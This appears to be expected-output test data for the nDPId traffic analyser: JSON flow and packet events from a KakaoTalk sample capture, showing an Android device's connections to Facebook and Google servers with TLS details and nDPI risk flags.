-00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} -00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} 